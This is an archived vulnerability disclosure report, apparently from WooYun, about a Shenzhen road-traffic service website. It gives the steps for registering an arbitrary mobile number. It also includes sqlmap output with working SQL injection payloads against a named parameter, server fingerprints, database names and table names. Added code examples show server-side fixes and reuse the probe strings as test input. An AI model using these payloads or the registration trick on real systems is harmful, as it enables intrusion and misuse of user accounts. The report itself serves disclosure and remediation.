WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
2014-07-01: Details sent to the vendor; awaiting vendor handling
2014-07-01: Vendor confirmed; details disclosed to the vendor only
2014-07-11: Details disclosed to core white hats and relevant domain experts
2014-07-21: Details disclosed to regular white hats
2014-07-31: Details disclosed to intern white hats
2014-08-15: Details disclosed to the public

Arbitrary mobile-number registration + SQL injection at a road traffic management service center
Shenzhen Road Traffic Management Service Center: http://www.szrtc.cn/
I looked at this site last month, and just now saw that someone had posted it on WooYun:
WooYun: Mobile registration verification code returned in plaintext, allowing arbitrary user registration
Coincidentally I had also recently noticed the site was on a new version, so I logged in and checked again, but the problem is still there.
1. Arbitrary mobile-number registration:
http://www.szrtc.cn/Home/Register
(On the registration page, enter your own mobile number, request the verification code, and then change the number to any other number.)
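The registration flaw above comes down to the server not binding the verification code to the number it was sent to (and, per the earlier WooYun report, returning the code to the browser at all). Below is an added example of the server-side design that closes both gaps; it is constructed for this page and is not szrtc.cn's code. The phone numbers, the secret and the clock values are constructed placeholders. The store keys each pending code by the phone number it was sent to, hashes it with an HMAC that covers the number, never hands the code back in the HTTP response, and makes it expire, single-use and guess-limited, so a code requested for one number cannot register another.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional


class VerificationStore:
    """Pending SMS verification codes, keyed by the number each code was sent to.

    Constructed example (not szrtc.cn code): the code is never returned to the
    browser, is bound to one phone number, expires, is single-use, and
    tolerates only a few wrong guesses.
    """

    def __init__(self, secret: bytes, ttl: float = 300.0, max_attempts: int = 5):
        self._secret = secret            # server-side secret, never sent to clients
        self._ttl = ttl                  # seconds a code stays valid
        self._max_attempts = max_attempts
        self._pending = {}               # phone -> [mac, expires_at, wrong_attempts]

    def _mac(self, phone: str, code: str) -> str:
        # The stored value covers phone AND code, so a code issued for number A
        # cannot verify for number B even if the lookup key were ever confused.
        msg = f"{phone}|{code}".encode()
        return hmac.new(self._secret, msg, hashlib.sha256).hexdigest()

    def issue(self, phone: str, now: Optional[float] = None) -> str:
        """Create a code for `phone`. The returned code goes to the SMS gateway
        only; the HTTP response to the browser must not contain it."""
        now = time.time() if now is None else now
        code = f"{secrets.randbelow(10**6):06d}"
        self._pending[phone] = [self._mac(phone, code), now + self._ttl, 0]
        return code

    def verify(self, phone: str, code: str, now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        entry = self._pending.get(phone)
        if entry is None:
            return False  # no code was ever sent to this number
        mac, expires_at, wrong = entry
        if now > expires_at or wrong >= self._max_attempts:
            del self._pending[phone]
            return False
        if hmac.compare_digest(mac, self._mac(phone, code)):
            del self._pending[phone]  # single use
            return True
        entry[2] = wrong + 1          # count the wrong guess
        return False


def register(store: VerificationStore, users: set, phone: str, code: str,
             now: Optional[float] = None) -> bool:
    """Registration handler: the number being registered is the number the
    code is checked against, so the client cannot substitute another one."""
    if phone in users or not store.verify(phone, code, now):
        return False
    users.add(phone)
    return True


if __name__ == "__main__":
    # Constructed walk-through: a code issued for one number is useless for another.
    store = VerificationStore(b"constructed-server-secret")
    users = set()
    code = store.issue("13800000001")           # would be sent by SMS
    print(register(store, users, "13800000002", code))  # False: wrong number
    print(register(store, users, "13800000001", code))  # True
```

The key property is that `verify` looks up the pending code by the number in the registration request, not by anything the client controls; the HMAC over `phone|code` is belt-and-braces for the case where the lookup key is ever changed to a session id.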
2. SQL injection:
http://www.szrtc.cn/Search/AdvanceResult?c=new&searchContent=1
sqlmap output (three runs: database list, current database, table list; the identical injection-point banner printed by each run is shown once):

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchContent
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: searchContent=0%' AND 5033=5033 AND '%'='

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: searchContent=0%' AND 7762=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SZRTCWeb_Product
[*] tempdb

current database: 'SZRTCWeb_Product'

Database: SZRTCWeb_Product
[20 tables]
+----------------------------+
| CIT_AnswerSheet            |
| CIT_AnswerSheet_Answer     |
| CIT_Question               |
| CIT_QuestionType           |
| CIT_Questionnaire          |
| CIT_Questionnaire_Options  |
| CIT_Questionnaire_Question |
| NEWS_Article               |
| NEWS_Attachment            |
| NEWS_Column                |
| USER_Account               |
| USER_AccountRole           |
| USER_Department            |
| USER_FunctionPermission    |
| USER_Functions             |
| USER_Menu                  |
| USER_MenuPermission        |
| USER_Role                  |
| Vw_AdvancedSearch          |
| Vw_UserOrRolePermission    |
+----------------------------+
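Both payloads sqlmap recorded work because the `searchContent` value is spliced into the text of a `LIKE` query, so the `'` in `0%'` closes the string literal and the rest is parsed as SQL. The added example below (constructed for this page, not the site's code; the table `news_article` and its rows are stand-ins and SQLite replaces SQL Server) puts the vulnerable concatenation next to the parameterized form and uses the page's own boolean-based probe pair to show the difference: the vulnerable function answers the true and false variants differently, giving an oracle, while the parameterized function returns the same (empty) result for both because the term is never parsed as SQL. It also escapes `%` and `_` so a user cannot turn the search term into a match-everything wildcard.

```python
import sqlite3

# Constructed sample rows standing in for an article table; not the site's schema.
SAMPLE_ARTICLES = [
    "Road closure notice 2014-06-30",
    "Traffic bulletin",
    "Parking regulations update",
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news_article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news_article (title) VALUES (?)",
                     [(t,) for t in SAMPLE_ARTICLES])
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # Vulnerable pattern: the user-supplied term becomes part of the SQL text,
    # so a quote in the term ends the literal and the remainder runs as SQL.
    sql = "SELECT title FROM news_article WHERE title LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def escape_like(term: str, esc: str = "\\") -> str:
    # Parameters stop injection; escaping % and _ additionally stops the user
    # from turning the pattern into a wildcard that matches every row.
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    # Hardened pattern: the term travels as a bound parameter and is treated
    # as data by the database engine, never as SQL.
    pattern = "%" + escape_like(term) + "%"
    sql = "SELECT title FROM news_article WHERE title LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, (pattern,))]


# The boolean-based blind probe pair from the sqlmap output on this page: the
# true and false variants differ only in the comparison, so an injectable
# endpoint answers them differently while a safe one answers them the same.
PROBE_TRUE = "0%' AND 5033=5033 AND '%'='"
PROBE_FALSE = "0%' AND 5033=5034 AND '%'='"


def has_boolean_oracle(search_fn) -> bool:
    """True if the two probes yield different results, i.e. the attacker's
    boolean expression influenced the query that ran."""
    conn = make_db()
    return search_fn(conn, PROBE_TRUE) != search_fn(conn, PROBE_FALSE)


if __name__ == "__main__":
    print("vulnerable gives oracle:", has_boolean_oracle(search_vulnerable))  # True
    print("parameterized gives oracle:", has_boolean_oracle(search_safe))     # False
```

In ASP.NET the equivalent change is to pass the search term through `SqlParameter` on the `SqlCommand` instead of building the command text by string concatenation; the escaping of `%` and `_` applies unchanged. Because the heavy-query payload above reads `sysusers`, parameterizing the query is what stops it; the database login the site uses should also be limited to the application's own database, but nothing in the sqlmap output above shows what rights that login has.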
Severity: High
Vulnerability Rank: 15
Confirmed: 2014-07-01 16:31
Thank you very much for your report. The issue described in the report has been confirmed and reproduced. Affected data: medium; attack cost: low; resulting impact: high; overall rating: high, rank: 15. We are contacting the administering unit of the relevant website to handle it.
None yet